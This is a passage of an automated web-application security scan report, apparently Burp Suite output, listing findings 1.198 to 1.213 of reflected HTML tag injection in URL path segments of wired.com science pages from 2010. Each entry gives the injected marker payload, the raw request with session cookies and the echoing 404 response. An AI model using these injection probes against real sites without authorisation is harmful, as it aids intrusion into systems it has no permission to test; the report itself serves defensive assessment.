

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries3da6c"><a>360db666dd0 c_news">
...[SNIP]...

1.198. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/1999/09/31631

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a30c"><a>b820a999ffb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news3a30c"><a>b820a999ffb/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:25 GMT
Date: Sun, 21 Nov 2010 23:13:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news3a30c"><a>b820a999ffb">
...[SNIP]...

1.199. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2006/04/70701

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2189"><a>e200d456324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceb2189"><a>e200d456324/discoveries/news/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:58 GMT
Date: Sun, 21 Nov 2010 23:12:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceb2189"><a>e200d456324 ss_discoveries c_news">
...[SNIP]...

1.200. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2006/04/70701

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fddd"><a>532487198c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries3fddd"><a>532487198c1/news/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:18 GMT
Date: Sun, 21 Nov 2010 23:13:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries3fddd"><a>532487198c1 c_news">
...[SNIP]...

1.201. http://www.wired.com/science/discoveries/news/2006/04/70701 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2006/04/70701

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba0f"><a>521893294d7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news6ba0f"><a>521893294d7/2006/04/70701 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:31 GMT
Date: Sun, 21 Nov 2010 23:13:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news6ba0f"><a>521893294d7">
...[SNIP]...

1.202. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72573

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e52a"><a>266a89d6056 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science6e52a"><a>266a89d6056/discoveries/news/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:10 GMT
Date: Sun, 21 Nov 2010 23:10:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science6e52a"><a>266a89d6056 ss_discoveries c_news">
...[SNIP]...

1.203. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72573

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c3b"><a>4f568f221b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries33c3b"><a>4f568f221b1/news/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:36 GMT
Date: Sun, 21 Nov 2010 23:10:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries33c3b"><a>4f568f221b1 c_news">
...[SNIP]...

1.204. http://www.wired.com/science/discoveries/news/2007/02/72573 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72573

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ce8"><a>7d46a6a8f6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsb4ce8"><a>7d46a6a8f6b/2007/02/72573 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb4ce8"><a>7d46a6a8f6b">
...[SNIP]...

1.205. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72649

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2186"><a>2b24d914e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencef2186"><a>2b24d914e5/discoveries/news/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:09 GMT
Date: Sun, 21 Nov 2010 23:10:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencef2186"><a>2b24d914e5 ss_discoveries c_news">
...[SNIP]...

1.206. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72649

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be0f"><a>71f4beaefd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries7be0f"><a>71f4beaefd6/news/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:36 GMT
Date: Sun, 21 Nov 2010 23:10:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries7be0f"><a>71f4beaefd6 c_news">
...[SNIP]...

1.207. http://www.wired.com/science/discoveries/news/2007/02/72649 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/02/72649

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 423ae"><a>3fe3a67e3bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news423ae"><a>3fe3a67e3bd/2007/02/72649 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:47 GMT
Date: Sun, 21 Nov 2010 23:10:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news423ae"><a>3fe3a67e3bd">
...[SNIP]...

1.208. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72723

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9720"><a>e9f4d710ca3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceb9720"><a>e9f4d710ca3/discoveries/news/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:57 GMT
Date: Sun, 21 Nov 2010 23:10:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceb9720"><a>e9f4d710ca3 ss_discoveries c_news">
...[SNIP]...

1.209. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72723

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee3a7"><a>2240bc5bf26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesee3a7"><a>2240bc5bf26/news/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:17 GMT
Date: Sun, 21 Nov 2010 23:11:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesee3a7"><a>2240bc5bf26 c_news">
...[SNIP]...

1.210. http://www.wired.com/science/discoveries/news/2007/03/72723 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72723

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e7bf"><a>a0ed15676db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news6e7bf"><a>a0ed15676db/2007/03/72723 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:29 GMT
Date: Sun, 21 Nov 2010 23:11:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news6e7bf"><a>a0ed15676db">
...[SNIP]...

1.211. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72805

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe9ae"><a>f527668027f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencefe9ae"><a>f527668027f/discoveries/news/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:56 GMT
Date: Sun, 21 Nov 2010 23:10:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencefe9ae"><a>f527668027f ss_discoveries c_news">
...[SNIP]...

1.212. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72805

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e162"><a>7810533295 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries7e162"><a>7810533295/news/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:13 GMT
Date: Sun, 21 Nov 2010 23:11:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries7e162"><a>7810533295 c_news">
...[SNIP]...

1.213. http://www.wired.com/science/discoveries/news/2007/03/72805 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2007/03/72805

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8058d"><a>0c1616ffa46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news8058d"><a>0c1616ffa46/2007/03/72805 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
